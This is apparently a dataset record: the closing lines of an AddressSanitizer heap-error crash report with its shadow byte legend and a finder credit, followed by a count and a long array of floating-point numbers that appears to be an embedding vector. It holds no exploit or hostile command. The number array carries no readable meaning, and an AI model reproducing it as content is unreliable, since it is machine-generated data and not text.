fa fa fa fa 0x3eba0110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==11298==ABORTING ``` Credits: Found by chong from OWL337. --- end body ---
5,364
[ -0.038035426288843155, -0.00627569854259491, -0.003889320185407996, -0.0031103563960641623, 0.014743492938578129, -0.009523519314825535, -0.012434094212949276, 0.028460586443543434, -0.030733328312635422, 0.020615963265299797, -0.017199520021677017, -0.0024926839396357536, -0.011634969152510166, 0.013042602688074112, 0.01953091286122799, 0.026495765894651413, -0.03237556666135788, 0.021525060757994652, -0.013541139662265778, -0.02052798680961132, 0.010212672874331474, 0.007346086669713259, -0.025967903435230255, 0.026085205376148224, -0.019442936405539513, -0.006217047106474638, -0.003599728923290968, 0.009758125059306622, -0.0023368913680315018, 0.007151803933084011, -0.021847642958164215, 0.005641530267894268, -0.0023038999643176794, 0.025791948661208153, 0.04140787944197655, 0.015674583613872528, 0.02067461423575878, 0.06046958267688751, -0.008614422753453255, -0.0047764224000275135, 0.0004623378918040544, -0.044164497405290604, -0.022507470101118088, 0.021246464923024178, 0.027419524267315865, 0.036510489881038666, 0.03659846633672714, -0.008328497409820557, -0.043460678309202194, 0.050733450800180435, 0.027522163465619087, 0.0007047330727800727, 0.002648476744070649, -0.031642425805330276, 0.00422290014103055, 0.008284509181976318, 0.04299146682024002, 0.02609986811876297, 0.02423768676817417, -0.017316821962594986, 0.001937328721396625, -0.01870979368686676, -0.007001509424299002, 0.016788959503173828, -0.004684779793024063, 0.022448819130659103, -0.027272896841168404, 0.019017713144421577, 0.0040909345261752605, -0.0057661645114421844, -0.02093854546546936, 0.018533838912844658, 0.01945759914815426, 0.06739044934511185, -0.009611496701836586, -0.0006570788682438433, -0.014802143909037113, 0.01577722281217575, -0.005066013894975185, 0.0020289714448153973, -0.0341644324362278, 0.006195052992552519, -0.011283060535788536, 0.016363738104701042, 0.023255275562405586, 0.007866617292165756, -0.03290342912077904, -0.054897699505090714, 0.008115885779261589, -0.004024951718747616, -0.018475187942385674, 0.04114395007491112, -0.019692203029990196, 0.017991313710808754, 0.0011015464551746845, 0.003154345089569688, -0.03554274141788483, 0.005685518961399794, -0.05416455864906311, 0.010564581491053104, -0.03173040226101875, -0.008497119881212711, -0.0035759019665420055, 0.016055818647146225, -0.000026533452910371125, 0.030938608571887016, 0.009178942069411278, -0.0207919180393219, 0.04656920209527016, 0.11014731228351593, 0.007254443597048521, -0.0004875396843999624, -0.024926841259002686, 0.01577722281217575, 0.01737547479569912, 0.018753781914711, 0.00296556088142097, -0.005333610810339451, -0.03906182572245598, -0.007969257421791553, -0.008702400140464306, -0.01186224352568388, -0.0023313926067203283, 0.022786064073443413, -0.00881970301270485, 0.024882851168513298, 0.02016141451895237, -0.00718479510396719, 0.000953085080254823, -0.006726581137627363, -0.05398860201239586, -0.041789114475250244, 0.0023405570536851883, -0.019809506833553314, 0.01655435375869274, -0.009948741644620895, -0.0002187971695093438, 0.056334659457206726, -0.018460525199770927, -0.04161316156387329, -0.028050027787685394, -0.03445769101381302, 0.015234698541462421, 0.00004344441185821779, -0.0038086746353656054, 0.004552814178168774, -0.03211163729429245, 0.04395921528339386, -0.005135662388056517, -0.006352678406983614, -0.00443551130592823, 0.0009521686588414013, 0.012602717615664005, 0.026979638263583183, 0.02127579227089882, -0.02268342487514019, 0.007558697834610939, 0.0527275986969471, -0.024589594453573227, -0.007327757775783539, -0.034692294895648956, -0.04164248704910278, -0.006367341615259647, -0.02343123033642769, -0.044193822890520096, -0.0019080030033364892, -0.0063966671004891396, 0.016319749876856804, 0.005307950545102358, 0.010623232461512089, -0.02346055582165718, 0.017096880823373795, 0.0047800880856812, 0.04002957418560982, -0.03991226851940155, 0.0012014370877295732, -0.0029325694777071476, -0.0072434465400874615, -0.01399568747729063, -0.03026411682367325, 0.023196624591946602, 0.011429689824581146, -0.00948686245828867, 0.009420879185199738, -0.006063087377697229, -0.04680380970239639, -0.0027877737302333117, -0.04988300800323486, 0.02082124352455139, -0.02183298021554947, -0.015132058411836624, -0.019765518605709076, 0.027463512495160103, -0.005161322187632322, 0.03319668769836426, 0.010425284504890442, -0.011788928881287575, -0.022742075845599174, 0.008805039338767529, -0.013262545689940453, 0.017771370708942413, -0.025513354688882828, -0.04536684975028038, -0.012470752000808716, -0.012111512012779713, 0.004398853983730078, -0.012243477627635002, 0.008489788509905338, 0.02309398539364338, -0.0016165788983926177, -0.030014848336577415, -0.01574789732694626, 0.009772787801921368, -0.028783168643712997, -0.029486985877156258, 0.02368049882352352, -0.00546557642519474, 0.020102763548493385, -0.030058836564421654, -0.006327018607407808, 0.009288913570344448, -0.014640852808952332, -0.02907642535865307, -0.007705326192080975, -0.05041087046265602, -0.008387148380279541, -0.013416505418717861, 0.03255151957273483, -0.041935741901397705, 0.01375375036150217, 0.01143702119588852, -0.013841727748513222, -0.013035271316766739, 0.00364738330245018, 0.025410713627934456, -0.005509564653038979, -0.012742014601826668, 0.004604134242981672, 0.03976564109325409, 0.0035135848447680473, 0.012610048986971378, 0.008211194537580013, -0.046539876610040665, -0.04190641641616821, 0.03835801035165787, 0.029267042875289917, -0.029868219047784805, -0.03181837871670723, -0.029912209138274193, 0.027111604809761047, 0.01863647811114788, -0.045718759298324585, -0.016363738104701042, -0.04636392369866371, 0.001898838672786951, 0.01180359162390232, 0.0034824262838810682, -0.019061701372265816, -0.025425376370549202, -0.0073864092119038105, 0.02123180218040943, 0.015909189358353615, -0.032991405576467514, 0.011832918040454388, 0.003790345974266529, 0.03730228170752525, -0.03545476496219635, 0.011524997651576996, 0.020073438063263893, -0.014391584321856499, 0.0315544456243515, -0.00993407890200615, 0.0022269198670983315, 0.010007393546402454, 0.01662766933441162, -0.0072764381766319275, -0.0008298255270346999, -0.003062702249735594, -0.025630656629800797, -0.017478113994002342, 0.025044143199920654, 0.009105628356337547, 0.012800665572285652, 0.03589465096592903, -0.0071151466108858585, 0.012683362700045109, 0.06774235516786575, 0.0013297370169311762, -0.009457536973059177, -0.007067492231726646, -0.013907711021602154, -0.020923882722854614, -0.025440040975809097, -0.000029812546927132644, 0.025586668401956558, -0.005340942181646824, -0.026011891663074493, 0.002208591438829899, -0.03656914085149765, 0.00028042696067132056, -0.02217022515833378, -0.030352093279361725, -0.02401774376630783, 0.011429689824581146, -0.029120415449142456, -0.01570390909910202, -0.007888611406087875, 0.009098296985030174, 0.0031121892388910055, -0.016099806874990463, 0.07243446260690689, -0.028094016015529633, -0.025264086201786995, -0.031642425805330276, -0.034281738102436066, -0.028123341500759125, 0.009662816300988197, -0.013893048278987408, -0.01648104004561901, 0.010205341503024101, -0.04730234667658806, -0.026275822892785072, -0.03891519829630852, 0.024589594453573227, 0.032727476209402084, -0.0043548657558858395, -0.03653981536626816, 0.023695161566138268, -0.06592416018247604, -0.002450528321787715, 0.011913563124835491, -0.029384346678853035, -0.018020639196038246, -0.013497150503098965, -0.03275680169463158, -0.030674677342176437, -0.03492690250277519, 0.053372763097286224, 0.029061762616038322, -0.023328589275479317, -0.04689178615808487, -0.009758125059306622, -0.024223024025559425, 0.007181129418313503, 0.006869543809443712, -0.009369559586048126, -0.021745001897215843, 0.020733265206217766, 0.04146653041243553, 0.0031653421465307474, 0.0009228429407812655, 0.025293411687016487, 0.043196748942136765, 0.006737578194588423, 0.045308198779821396, -0.013387179933488369, -0.04689178615808487, -0.010872500948607922, 0.025513354688882828, -0.016656994819641113, -0.0015487632481381297, -0.03545476496219635, 0.009061639197170734, -0.0027346210554242134, 0.0057661645114421844, -0.008064566180109978, 0.012829991057515144, -0.009420879185199738, -0.035249486565589905, 0.011884237639605999, -0.022566121071577072, 0.03656914085149765, 0.009032313711941242, 0.018651140853762627, -0.003352293511852622, -0.055044326931238174, 0.01375375036150217, 0.003856328781694174, -0.020102763548493385, 0.010747866705060005, 0.004167914390563965, 0.007467054761946201, 0.020762592554092407, -0.019428271800279617, 0.022712750360369682, 0.0007711741491220891, -0.03319668769836426, 0.028871146962046623, -0.029428334906697273, -0.018313895910978317, -0.008372485637664795, 0.05187715217471123, -0.02910575270652771, -0.01401768159121275, -0.03140781819820404, 0.05313815921545029, 0.02670104429125786, -0.004483165685087442, 0.003222160739824176, -0.06938458979129791, -0.003592397551983595, -0.015879863873124123, 0.007269106339663267, -0.011129100807011127, -0.00969214178621769, 0.014332933351397514, 0.009398885071277618, -0.02280072681605816, 0.016099806874990463, 0.017624743282794952, 0.04064541310071945, -0.0123461177572608, -0.037478238344192505, 0.016539691016077995, 0.03683307394385338, 0.021114500239491463, 0.014992761425673962, -0.02573329769074917, -0.038885872811079025, 0.02413504756987095, -0.04434045031666756, -0.004483165685087442, 0.0219062939286232, 0.004296214319765568, -0.004607799928635359, 0.0018731787567958236, -0.03997092321515083, -0.0035282475873827934, 0.014296276494860649, -0.0084458002820611, -0.035660043358802795, 0.01982416957616806, 0.017771370708942413, 0.0367450937628746, 0.006473646964877844, -0.04131990298628807, -0.00796192605048418, -0.054369837045669556, -0.02995619736611843, -0.029897546395659447, 0.03026411682367325, -0.012434094212949276, -0.05428186058998108, -0.02721424400806427, 0.005033022258430719, -0.04580673575401306, -0.03876856714487076, 0.019032375887036324, 0.011070449836552143, 0.016920926049351692, -0.02568930760025978, 0.011590980924665928, 0.0006350845796987414, -0.010073375888168812, 0.03334331512451172, -0.014362258836627007, -0.022991344332695007, -0.0005287789390422404, -0.016422389075160027, 0.013203893788158894, 0.011371037922799587, 0.0061730588786304, -0.014310939237475395, -0.023885779082775116, -0.028020700439810753, 0.03026411682367325, 0.016613006591796875, -0.006125404499471188, -0.018504513427615166, -0.02205292321741581, 0.02810867875814438, 0.02605587989091873, -0.00003101535912719555, 0.006891538389027119, -0.020850569009780884, -0.001792533090338111, 0.017580753192305565, -0.027302222326397896, 0.02304999530315399, -0.03850463777780533, -0.01670098304748535, -0.0036437176167964935, -0.013409174047410488, 0.037918124347925186, 0.016085144132375717, 0.001937328721396625, 0.019765518605709076, 0.02873918041586876, -0.01975085586309433, 0.002952730981633067, 0.03797677531838417, -0.0018273573368787766, -0.046950437128543854, -0.02884182147681713, -0.010051381774246693, 0.005722176283597946, -0.03205298259854317, -0.03334331512451172, 0.02239016816020012, -0.002694298280403018, 0.01897372491657734, -0.08492720872163773, 0.054340511560440063, 0.002199426991865039, -0.006884207017719746, -0.03953103721141815, -0.0269209872931242, 0.016011828556656837, -0.014992761425673962, -0.0326688252389431, -0.017478113994002342, -0.03199433162808418, -0.014677510596811771, -0.03278612717986107, -0.0041862428188323975, -0.017140869051218033, 0.02423768676817417, 0.015425315126776695, 0.03319668769836426, 0.014604195952415466, -0.022918030619621277, -0.006202384363859892, -0.013966361992061138, 0.029149740934371948, 0.017771370708942413, -0.0022379171568900347, 0.015322674997150898, 0.014047008007764816, 0.015366664156317711, -0.031759727746248245, -0.009061639197170734, 0.007434063591063023, -0.01752210222184658, 0.048358071595430374, 0.006209715735167265, -0.017243508249521255, -0.01945759914815426, 0.03234624117612839, -0.004530819598585367, 0.001944660092703998, 0.0022049257531762123, 0.06539630144834518, -0.00881970301270485, 0.010241999290883541, -0.021114500239491463, 0.02973625436425209, -0.010784524492919445, 0.02161303721368313, 0.020835906267166138, 0.018240582197904587, -0.017844684422016144, -0.023885779082775116, -0.01659834384918213, 0.012375443242490292, -0.020777255296707153, -0.014332933351397514, -0.0076833320781588554, 0.029091089963912964, 0.00033701639040373266, 0.00329914060421288, -0.00991208478808403, -0.015615932643413544, 0.02851923741400242, -0.024472292512655258, -0.030909281224012375, -0.020249392837285995, 0.00558654498308897, 0.06351945549249649, -0.062463730573654175, 0.004985367879271507, 0.026906324550509453, -0.022712750360369682, 0.023739149793982506, -0.01822591945528984, -0.007954594679176807, -0.0010053215082734823, -0.03577734902501106, 0.0129912830889225, 0.006074084434658289, -0.03184770420193672, 0.027492837980389595, -0.03225826472043991, 0.0036345531698316336, 0.028709854930639267, 0.0061107417568564415, -0.036011952906847, -0.006858546752482653, 0.023548532277345657, -0.01126839779317379, -0.025923913344740868, 0.006059421692043543, 0.008673073723912239, -0.009516187943518162, -0.010205341503024101, 0.013555802404880524, -0.013467825017869473, 0.004710439592599869, -0.016539691016077995, 0.032316915690898895, -0.01130505558103323, -0.0044978284277021885, 0.0426982119679451, -0.004406185820698738, -0.03387117758393288, 0.0027584482450038195, 0.01652502827346325, -0.009772787801921368, -0.006414995528757572, -0.018181931227445602, 0.03387117758393288, 0.016319749876856804, 0.02568930760025978, 0.04058676213026047, -0.0072581092827022076, -0.004402519669383764, 0.009824107401072979, -0.00364738330245018, 0.012917968444526196, -0.01266136858612299, 0.014112990349531174, 0.012610048986971378, -0.046979762613773346, 0.001928164390847087, -0.012536734342575073, -0.0036327203270047903, 0.02435498870909214, -0.03205298259854317, -0.03002951107919216, -0.014171642251312733, -0.007947263307869434, 0.0018704294925555587, 0.004871731158345938, -0.010498598217964172, -0.012485414743423462, -0.00833582878112793, 0.04090934246778488, 0.02651042863726616, 0.010351969860494137, 0.001777870231308043, -0.016803622245788574, 0.003933308646082878, 0.023299263790249825, -0.03633453696966171, -0.023621847853064537, -0.017683394253253937, -0.0006208799313753843, -0.007734652142971754, 0.01718485727906227, 0.019472261890769005, 0.01563059538602829, -0.008533776737749577, -0.022082248702645302, 0.024223024025559425, 0.0033926162868738174, -0.011004466563463211, 0.004743431229144335, 0.04261023551225662, 0.031466469168663025, -0.012873980216681957, -0.018533838912844658, -0.018885746598243713, -0.03026411682367325, -0.022184887900948524, -0.012463420629501343, 0.03568936884403229, -0.011202415451407433, -0.013959030620753765, 0.026554416865110397, 0.0069318609312176704, 0.008130548521876335, -0.0018163601635023952, -0.006319687236100435, 0.015689246356487274, 0.011165758594870567, 0.0009173444123007357, -0.03953103721141815, -0.011371037922799587, 0.017507439479231834, -0.030058836564421654, 0.024369651451706886, -0.012184825725853443, -0.009523519314825535, -0.008695068769156933, 0.0013398176524788141, -0.013167236931622028, 0.006162061356008053, -0.015527955256402493, 0.03319668769836426, 0.007129809353500605, -0.022786064073443413, 0.014530881308019161, 0.014684841968119144, 0.03768351674079895, 0.01730215921998024, 0.0036583803594112396, -0.013497150503098965, 0.014648184180259705, 0.029794905334711075, -0.02476554922759533, -0.03832868114113808, -0.02985355630517006, -0.0008765633683651686, -0.005832147318869829, 0.023563195019960403, 0.004138588439673185, 0.032580845057964325, -0.01332852803170681, 0.01744878850877285, 0.03137849271297455, 0.00959683395922184, -0.010344638489186764, -0.008907679468393326, -0.04372461140155792, 0.029648277908563614, -0.012690694071352482, -0.019032375887036324, -0.003966300282627344, 0.02023473009467125, 0.016876937821507454, -0.0037793489173054695, -0.03143714368343353, -0.0021829314064234495, -0.03598262742161751, -0.04882728308439255, -0.009340234100818634, -0.005000031087547541, 0.014655515551567078, 0.021173151209950447, -0.002842759480699897, 0.01557194348424673, -0.014069002121686935, -0.04164248704910278, -0.011583649553358555, 0.0004078104393556714, -0.039296429604291916, 0.014061670750379562, -0.01308659091591835, 0.008196531794965267, 0.01730215921998024, 0.009501525200903416, 0.0005512314382940531, 0.0246922355145216, 0.009032313711941242, 0.0052236393094062805, -0.0005196146667003632, -0.02137843146920204, -0.02231685444712639, 0.00708215544000268, -0.04044013470411301, -0.009633490815758705, 0.004721436649560928, 0.01490478403866291, 0.01700890250504017, -0.02353386953473091, -0.006070418749004602, 0.017771370708942413, 0.01934029534459114, -0.030498722568154335, 0.02387111447751522, 0.005876136012375355, 0.0023790469858795404, 0.009288913570344448, 0.022742075845599174, 0.028973786160349846, 0.011422358453273773, -0.013636448420584202, 0.024296337738633156, -0.0348975770175457, -0.004365862812846899, 0.010058713145554066, 0.01788867451250553, -0.03568936884403229, -0.03167175129055977, 0.022566121071577072, 0.004574808292090893, -0.02316729910671711, -0.006799895316362381, 0.0337832011282444, 0.006242707371711731, 0.018035301938652992, -0.02219955064356327, 0.009545513428747654, -0.0029838893096894026, 0.0261731818318367, 0.000911845825612545, -0.0031506794039160013, 0.023416567593812943, -0.01180359162390232, 0.007881280034780502, 0.023035332560539246, -0.017140869051218033, -0.0013288204791024327, 0.022155562415719032, 0.0050880080088973045, -0.002996719442307949, -0.043079447001218796, -0.021745001897215843, 0.012008871883153915, -0.027302222326397896, -0.016437051817774773, 0.0031653421465307474, 0.0341644324362278, -0.035396113991737366, 0.016730308532714844, -0.019354958087205887, -0.008482457138597965, 0.004002957139164209, 0.017756707966327667, 0.00809389166533947, 0.03017614036798477, -0.0076979948207736015, -0.011825586669147015, 0.007316760718822479, -0.022786064073443413, -0.007705326192080975, 0.004068939946591854, 0.003002217970788479, -0.000786295160651207, 0.03167175129055977, 0.0282113179564476, -0.010088038630783558, -0.013519145548343658, 0.028240643441677094, -0.02142241969704628, -0.012302128598093987, 0.00465911952778697, 0.03293275460600853, -0.0073864092119038105, 0.017140869051218033, 0.0077493148855865, -0.013849059119820595, -0.01948692463338375, -0.011165758594870567, 0.024003081023693085, -0.013071928173303604, 0.01228746585547924, -0.014750824309885502, 0.02554268017411232, -0.03252219408750534, 0.02573329769074917, 0.023445893079042435, -0.0014516218798235059, -0.016803622245788574, 0.008533776737749577, 0.008035240694880486, -0.026114530861377716, -0.01997079886496067, -0.005883467383682728, -0.009530850686132908, -0.009010319598019123, 0.045161571353673935, 0.012096849270164967, -0.00008070293552009389, 0.008343160152435303, -0.0035832333378493786, -0.01778603345155716, 0.018871083855628967, -0.008321166038513184, 0.009369559586048126, -0.013863721862435341, 0.02758081629872322, 0.002829929580911994, -0.006554292514920235, -0.015527955256402493, 0.0356307178735733, 0.005729507654905319, -0.008475125767290592, -0.06967785209417343, -0.00043140846537426114, -0.022184887900948524, 0.016011828556656837, -0.002866586670279503, 0.036217231303453445, 0.005117333494126797, -0.002173767192289233, -0.012390105985105038, -0.0069318609312176704, 0.004978036507964134, 0.021187813952565193, 0.006184055935591459, -0.02825530618429184, 0.017771370708942413, -0.044164497405290604, 0.010703878477215767, 0.011429689824581146, -0.054105907678604126, 0.00029142407584004104, -0.04357798397541046, -0.0036363862454891205, -0.01037396490573883, -0.0020088101737201214, 0.003273480571806431, -0.02973625436425209, -0.0330500565469265, 0.008181869052350521, 0.024457629770040512, -0.015982503071427345, -0.00846779439598322, -0.005905461963266134, 0.006286695599555969, -0.01626109704375267, -0.01527868676930666, -0.03208230808377266, -0.016862275078892708, -0.014215630479156971, 0.030674677342176437, 0.04243427887558937, -0.0053849308751523495, 0.011385700665414333, 0.02517610974609852, 0.029604287818074226, 0.0061034103855490685, -0.02743418700993061, -0.04478033632040024, 0.0025385054759681225, 0.012294797226786613, -0.025865262374281883, 0.014728830195963383, 0.0015029418282210827, 0.03615858033299446, 0.019912146031856537, 0.028636541217565536, -0.013115917332470417, -0.007478052284568548, -0.02052798680961132, -0.007676000706851482, -0.014538212679326534, 0.002430367050692439, -0.011928225867450237, 0.008233188651502132, -0.01164230052381754, 0.00444650836288929, 0.007192126475274563, -0.006579952780157328, -0.0011217078426852822, 0.011451683938503265, -0.020190740004181862, -0.0014791147550567985, -0.035923976451158524, -0.037624865770339966, 0.0019354958785697818, 0.006400332786142826, -0.00627569854259491, 0.017580753192305565, 0.008115885779261589, 0.02631981112062931, 0.018137942999601364, -0.01919366791844368, -0.005472907796502113, 0.013629116117954254, -0.02272741310298443, -0.03979496657848358, 0.0040836031548678875, -0.008394479751586914, -0.013973693363368511, 0.02818199247121811, -0.013805070891976357, 0.010425284504890442, -0.031642425805330276, 0.016363738104701042, 0.013152574189007282, 0.013475156389176846, -0.0009159697219729424, -0.015879863873124123, 0.007287435233592987, 0.029061762616038322, -0.020762592554092407, 0.0191203523427248, 0.0031158551573753357, -0.0334019660949707, -0.009758125059306622, 0.0012023535091429949, 0.015733234584331512, 0.00820386316627264, -0.027228906750679016, 0.022272864356637, 0.015176046639680862, -0.035923976451158524, -0.018577827140688896, 0.018665805459022522, -0.033167362213134766, 0.010630563832819462, 0.02353386953473091, 0.005645196419209242, 0.004681114107370377, -0.02818199247121811, 0.0009576671873219311, -0.0036198904272168875, 0.003984628710895777, 0.024398978799581528, -0.006066753063350916, -0.01815260574221611, 0.022287527099251747, -0.01589452661573887, -0.00918627344071865, 0.008181869052350521, -0.007170132361352444, -0.027830084785819054, -0.03571869432926178, -0.02064528875052929, -0.018988387659192085, -0.008988325484097004, 0.04859267547726631, 0.0109531469643116, -0.023900441825389862, -0.01718485727906227, -0.00016827908984851092, 0.017390137538313866, -0.019736193120479584, 0.009105628356337547, -0.012602717615664005, 0.004167914390563965, 0.016539691016077995, -0.0012619212502613664, 0.0490032359957695, 0.0005778078339062631, -0.02074792981147766, 0.02758081629872322, 0.037331610918045044, 0.042346302419900894, -0.006272032856941223, -0.006414995528757572, -0.0054765734821558, -0.0034860919695347548, -0.0022489142138510942, 0.01781535893678665, -0.00787394866347313, -0.00991208478808403, 0.015395989641547203, 0.012756677344441414, -0.018211256712675095, -0.009061639197170734, -0.010066044516861439, 0.011524997651576996, 0.006473646964877844, -0.016158457845449448, 0.012683362700045109, -0.0170822162181139, 0.000928799738176167, 0.007434063591063023, 0.06856347620487213, -0.004248559940606356, 0.0052236393094062805, 0.019853495061397552, -0.01527868676930666, 0.02280072681605816, 0.01749277673661709, 0.0044904970563948154, 0.017830021679401398, -0.0066605983301997185, 0.010520593263208866, -0.035366788506507874, 0.03261017054319382, -0.01403234526515007, 0.014090996235609055, -0.01870979368686676, 0.005175984930247068, -0.032316915690898895, -0.0159678403288126, -0.00931823905557394, -0.01982416957616806, -0.001652319566346705, -0.0038929858710616827, -0.02699430100619793, -0.008181869052350521, -0.01626109704375267, 0.01093115285038948, 0.012162831611931324, 0.02428167499601841, 0.021510396152734756, -0.00131599057931453, -0.012602717615664005, -0.01640772633254528, -0.019149677827954292, 0.011568986810743809, -0.024853525683283806, 0.0011235406855121255, 0.0019208330195397139, 0.005157656501978636, -0.02060130052268505, -0.017434125766158104, -0.014061670750379562, -0.03337264060974121, 0.011590980924665928, -0.012815328314900398, -0.016539691016077995, -0.012331455014646053, -0.032023657113313675, 0.009816776029765606, 0.0005292371497489512, -0.0168916005641222, -0.017698056995868683, -0.030117487534880638, 0.0017861181404441595, -0.008321166038513184, 0.009054307825863361, 0.011290392838418484, 0.10293319076299667, -0.006656932644546032, 0.026774359866976738, -0.014310939237475395, -0.013174568302929401, -0.010256662033498287, -0.008797707967460155, -0.004252225626260042, 0.015176046639680862, -0.010674552991986275, 0.019721530377864838, 0.014039676636457443, 0.007888611406087875, -0.00005764904562965967, -0.0011473677586764097, 0.017170194536447525, -0.014516218565404415, -0.007401071954518557, 0.007624680642038584, -0.003449434880167246, 0.022624773904681206, 0.01297661941498518, 0.0037426918279379606, -0.0025018483866006136, 0.041935741901397705, -0.016217108815908432, -0.02086523175239563, -0.029765579849481583, -0.03557206690311432, -0.026833010837435722, 0.005084342323243618, 0.006484644021838903, -0.0018740951782092452, -0.01599716581404209, -0.00969214178621769, 0.009127622470259666, 0.023328589275479317, 0.006433324422687292, -0.009662816300988197, -0.03222893923521042, -0.02420836128294468, -0.01574789732694626, -0.01722884550690651, 0.013768414035439491, -0.0029399008490145206, 0.004259556997567415, 0.008387148380279541, 0.00809389166533947, -0.01681828498840332, 0.014868127182126045, -0.018680468201637268, -0.008130548521876335, 0.0027419524267315865, -0.007844623178243637, -0.011422358453273773, 0.0031048578675836325, -0.013409174047410488, -0.017917999997735023, -0.025894587859511375, -0.00030952354427427053, 0.00626470148563385, 0.0008816036861389875, -0.03486825153231621, -0.001456203986890614, -0.005267628002911806, -0.008849028497934341, -0.026642393320798874, 0.016158457845449448, -0.017610078677535057, 0.002791439648717642, 0.01239743735641241, 0.010447278618812561, 0.010234666988253593, 0.003728028852492571, -0.01630508527159691, -0.013416505418717861, -0.016495702788233757, 0.005212642252445221, -0.025997228920459747, -0.02825530618429184, 0.010564581491053104, -0.005615870468318462, -0.003863660153001547, 0.003458599094301462, 0.00820386316627264, 0.03709700331091881, -0.01941360905766487, -0.008790376596152782, -0.0104912668466568, 0.01151033490896225, -0.021701013669371605, -0.005208976566791534, -0.014200967736542225, -0.0037408589851111174, 0.017580753192305565, 0.017419463023543358, 0.010513261891901493, -0.019472261890769005, -0.015322674997150898, -0.008504451252520084, 0.0030223794747143984, -0.0013645612634718418, 0.009956073015928268, 0.0013306534383445978, -0.012822659686207771, 0.01143702119588852, -0.004285217262804508, -0.0029545638244599104, -0.023006007075309753, -0.007888611406087875, -0.007719988934695721, -0.016656994819641113, 0.018093952909111977, -0.02052798680961132, -0.01013202778995037, 0.0028849150985479355, -0.006807226687669754, -0.033724550157785416, -0.028050027787685394, -0.03152512013912201, -0.02142241969704628, 0.01210418064147234, 0.00833582878112793, -0.03167175129055977, -0.00012085393973393366, 0.014010350219905376, 0.0348975770175457, -0.026686381548643112, 0.008958999998867512, 0.01648104004561901, 0.027830084785819054, 0.00730576366186142, 0.012822659686207771, -0.015234698541462421, -0.005711179226636887, -0.022434156388044357, 0.02101186104118824, -0.007368080783635378, 0.008086560294032097, 0.013819733634591103, 0.0015991667751222849, 0.008291840553283691, 0.011825586669147015, -0.012353449128568172, 0.016613006591796875, -0.022859379649162292, 0.009494193829596043, 0.006466315593570471, 0.006316021550446749, -0.024560268968343735, 0.017404800280928612, -0.029428334906697273, 0.0017980316188186407, 0.01416431088000536, -0.0009897422278299928, -0.0007904191152192652, 0.01490478403866291, -0.008394479751586914, -0.00502202520146966, 0.01592385210096836, -0.0061180731281638145, -0.008526445366442204, 0.010102701373398304, -0.02297668159008026, -0.01759541593492031, 0.03158377483487129, -0.013878384605050087, -0.0269209872931242, -0.002358885481953621, 0.01703822799026966, 0.018357884138822556, -0.00918627344071865, -0.009604165330529213, -0.0014626190531998873, 0.011766934767365456, 0.023035332560539246, 0.0007606351864524186, -0.0013389012310653925, 0.03771284222602844, -0.029384346678853035, -0.0030810306780040264, 0.006000770255923271, 0.01520537305623293, 0.00006798750109737739, 0.005311616230756044, -0.010725872591137886, -0.012426762841641903, 0.014626190066337585, -0.03325533866882324, 0.01645171456038952, 0.008621754124760628, -0.001656901789829135, -0.02212623693048954, -0.0013297370169311762, 0.023929767310619354, -0.043343376368284225, 0.0015111897373571992, -0.026862336322665215, -0.0025604998227208853, 0.005406924989074469, -0.011055787093937397, -0.012712688185274601, -0.011671626009047031, -0.006403998471796513, -0.010300650261342525, -0.03058669902384281, -0.01228746585547924, -0.0011556156678125262, -0.009076302871108055, 0.00479841697961092, 0.001913501531817019, -0.011979546397924423, 0.004208237398415804, -0.011422358453273773, 0.021481070667505264, 0.015791887417435646, 0.008357822895050049, -0.014501555822789669, -0.024252349510788918, 0.006766904145479202, -0.0019116686889901757, 0.007661337498575449, -0.009171610698103905, 0.018651140853762627, -0.01934029534459114, 0.004310877062380314, 0.012668699957430363, -0.021363768726587296, 0.009926747530698776, -0.009574838913977146, -0.024076394736766815, 0.009252256713807583, 0.013497150503098965, 0.017976650968194008, -0.013240551576018333, -0.03671576827764511, -0.000701525597833097, 0.006484644021838903, -0.00857776589691639, 0.008262514136731625, 0.003403613343834877, -0.007727320306003094, -0.0378594733774662, -0.013937036506831646, 0.0028097680769860744, -0.00025316321989521384, 0.0053519392386078835, 0.009662816300988197, -0.00034388958010822535, 0.03029344230890274, -0.009068971499800682, 0.006206050049513578, -0.0043548657558858395, -0.019985461607575417, -0.007734652142971754, -0.006407664157450199, -0.033167362213134766, -0.026349136605858803, -0.007932600565254688, -0.007430397905409336, 0.01715553179383278, -0.009413547813892365, 0.00028913302230648696, 0.023328589275479317, -0.017961988225579262, 0.028797831386327744, -0.0054765734821558, -0.011678958311676979, 0.01037396490573883, -0.0018786772852763534, 0.020953208208084106, -0.007287435233592987, 0.009662816300988197, -0.014765487052500248, -0.00013322570885065943, 0.012272803112864494, 0.01945759914815426, -0.015454640612006187, -0.002241582842543721, 0.00878304522484541, -0.006469981279224157, 0.013064596801996231, 0.031349167227745056, -0.03331398963928223, 0.003585066180676222, -0.0024230354465544224, -0.03366589918732643, 0.003458599094301462, -0.029501648619771004, 0.00016094766033347696, 0.0005388596327975392, 0.0037335273809731007, 0.00015075239934958518, -0.026334473863244057, 0.015615932643413544, 0.0021132829133421183, -0.008966331370174885, 0.02673036977648735, 0.010329975746572018, -0.005736839026212692, -0.008607091382145882, 0.019574901089072227, 0.008357822895050049, -0.005945784505456686, 0.0032808121759444475, -0.015733234584331512, -0.018181931227445602, 0.010865169577300549, 0.009523519314825535, 0.0010878000175580382, -0.0017842851812019944, 0.0104912668466568, -0.028680529445409775, -0.01458953320980072, 0.0004387398948892951, -0.012602717615664005, -0.02057197503745556, 0.001139119965955615, -0.02590925060212612, 0.006550626829266548, -0.0027181252371519804, -0.007610017899423838, -0.013071928173303604, -0.026481103152036667, -0.016774296760559082, -0.008504451252520084, -0.012324122712016106, -0.020894557237625122, -0.01458953320980072, -0.01934029534459114, 0.03504420444369316, 0.009384222328662872, 0.035513415932655334, -0.02183298021554947, 0.0019611557945609093, 0.01970686763525009, -0.0093768909573555, -0.018621815368533134, -0.011070449836552143, 0.021583711728453636, -0.013783076778054237, 0.026569079607725143, -0.010146690532565117, -0.003035209374502301, 0.010835844092071056, 0.006785232573747635, -0.007302097976207733, -0.007888611406087875, -0.007624680642038584, -0.027463512495160103, -0.006766904145479202, -0.006484644021838903, 0.019516250118613243, -0.0021444414742290974, 0.015513292513787746, 